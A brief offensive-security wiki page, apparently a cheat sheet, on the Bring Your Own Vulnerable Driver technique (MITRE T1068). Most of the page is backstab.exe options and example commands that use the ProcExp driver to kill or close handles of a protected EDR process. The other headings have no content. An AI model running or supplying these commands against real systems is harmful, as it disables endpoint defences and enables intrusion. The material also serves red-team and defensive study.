Bring Your Own Vulnerable Driver (BYOVD)
MITRE ATT&CK™ Exploitation for Privilege Escalation - Technique T1068
Theory
Practice
Killing AV/EDDR
# -n, Choose process by name, including the .exe suffix
# -p, Choose process by PID
# -l, List handles of protected process
# -k, Kill the protected process by closing its handles
# -x, Close a specific handle
# -d, Specify path to where ProcExp will be extracted
# -s, Specify service name registry key
# -u, Unload ProcExp driver
# -a, adds SeDebugPrivilege
#Examples:
#Kill cyserver
backstab.exe -n cyserver.exe -k
#Close handle E4C of cyserver
backstab.exe -n cyserver.exe -x E4C
#List all handles of cyserver
backstab.exe -n cyserver.exe -l
#Kill protected process with PID 4326, extract ProcExp driver to C:\ drive
backstab.exe -p 4326 -k -d c:\\driver.sysWindows Filtering Platform (WPF) Callout Driver
Kernel Object Tampering
Hijacking Valid Drivers
Resources
Last updated